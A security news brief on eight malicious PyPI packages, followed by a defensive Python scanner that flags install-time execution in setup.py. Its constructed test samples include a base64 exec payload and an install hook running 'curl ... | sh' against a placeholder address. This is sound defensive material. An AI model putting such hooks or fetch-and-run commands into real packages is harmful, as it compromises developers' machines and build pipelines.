Software package repositories have become a common target for supply chain attacks. Recently there has been news of attackers abusing npm. This time it is software libraries in the Python Package Index (PyPI).

What’s going on?

  • Eight libraries contained malicious code and were removed by the PyPI maintainers.
  • Two of the eight allowed an attacker to run commands remotely on the victim's machine; the other six were information stealers.
  • The stealers pilfered data, including Discord tokens, payment card information, and basic system details, from developers' devices.
  • The libraries had been downloaded more than 30,000 times before they were removed from the index.
  • Discord publishes its own API that gives developers new ways to interact with the service. Large volumes of malware have been observed hosted on Discord's own content delivery network, and malware has also been found interacting with Discord's APIs.

Why does it matter?

  • Once such packages are published in the repository, they let attackers distribute malware and launch attacks against developer workstations and CI/CD machines, since the malicious code runs wherever the package is installed or imported.
  • Several of the identified packages are capable of sophisticated attacks: executing code remotely on the victim's system, collecting network data, and pilfering passwords saved in web browsers.
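A check a practitioner can run before a package like these reaches a developer machine or CI runner, added here as an example and not taken from the article or from any of the packages it describes: a heuristic static scan of a package's setup.py for install-time execution indicators, such as a payload that is base64-decoded and exec'd while pip runs setup.py, a custom install command class, or process spawning. The sample setup.py sources below are constructed for the demonstration, and the indicator lists, package names and the TEST-NET address in them are assumptions, not indicators from the real packages.

```python
"""Heuristic scan of setup.py for install-time code execution indicators.

Added example (not the article's or any real package's code). It parses the
file with the ast module and never executes it, so it is safe to run against
an untrusted sdist before installation.
"""
import ast
import base64  # used only to build the constructed sample below

# Module roots whose presence in setup.py deserves a second look: a packaging
# script rarely needs to decode blobs, spawn processes or open sockets.
# Assumed heuristic list, not an authoritative signature set.
SUSPICIOUS_MODULES = {
    "base64", "subprocess", "socket", "urllib", "requests",
    "ctypes", "marshal", "zlib",
}
# Builtins that turn data into running code.
SUSPICIOUS_BUILTINS = {"exec", "eval", "compile", "__import__"}
# Dotted calls that decode or execute.
SUSPICIOUS_CALLS = {
    "base64.b64decode", "os.system", "os.popen",
    "subprocess.Popen", "subprocess.run", "subprocess.call",
    "subprocess.check_output",
}


def _call_name(call: ast.Call) -> str:
    """Return a dotted name for the callee, e.g. 'base64.b64decode'."""
    parts = []
    func = call.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def scan_setup_source(source: str) -> list:
    """Return a sorted list of indicator tags found in setup.py source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                if root in SUSPICIOUS_MODULES:
                    findings.add(f"import:{root}")
        elif isinstance(node, ast.ImportFrom):
            root = (node.module or "").split(".")[0]
            if root in SUSPICIOUS_MODULES:
                findings.add(f"import:{root}")
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in SUSPICIOUS_BUILTINS or name in SUSPICIOUS_CALLS:
                findings.add(f"call:{name}")
            # A cmdclass override lets the package run arbitrary code in
            # its own install/develop command, a classic trojan hook.
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.add("cmdclass-override")
    return sorted(findings)


def scan_setup_file(path: str) -> list:
    """Scan a setup.py on disk (e.g. from an extracted sdist)."""
    with open(path, encoding="utf-8") as fh:
        return scan_setup_source(fh.read())


# --- constructed samples ---------------------------------------------------
# Trojanized: a base64 payload decoded and exec'd during `pip install`.
_PAYLOAD = base64.b64encode(b"import os; os.system('id')").decode()
TROJAN_SETUP_PY = f'''
from setuptools import setup
import base64, subprocess
exec(base64.b64decode("{_PAYLOAD}"))
setup(name="totally-legit", version="0.1")
'''

# Trojanized via a custom install command; the URL is a TEST-NET address.
CMDCLASS_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        __import__("os").system("curl http://198.51.100.7/x | sh")

setup(name="quiet-helper", version="0.2", cmdclass={"install": PostInstall})
'''

# Ordinary package with nothing to flag.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="legit", version="1.0", packages=["legit"])
'''

if __name__ == "__main__":
    for label, src in [("trojan", TROJAN_SETUP_PY),
                       ("cmdclass", CMDCLASS_SETUP_PY),
                       ("benign", BENIGN_SETUP_PY)]:
        print(label, scan_setup_source(src))
```

Run this against the setup.py inside each sdist before it is installed on a build agent; an empty result is not a clean bill of health (the stealers on this page could just as well run at import time from the package body), but any hit on a dependency that is supposed to be pure packaging glue is reason to stop the pipeline and read the file.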

The bottom line

The malicious packages recently discovered on PyPI have critical implications for the Python ecosystem. The steady discovery of insidious malicious packages in popular repositories has become a disturbing trend that results in supply chain attacks. This systemic threat needs to be actively tackled by both developers and the maintainers of code repositories.

Cyware Publisher
